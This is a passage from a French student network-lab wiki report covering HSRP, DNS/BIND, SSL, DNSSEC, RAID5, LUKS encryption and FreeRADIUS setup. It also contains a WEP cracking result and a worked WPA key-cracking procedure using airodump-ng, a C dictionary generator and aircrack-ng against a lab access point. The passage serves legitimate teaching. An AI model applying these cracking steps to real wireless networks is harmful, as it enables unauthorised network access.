    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
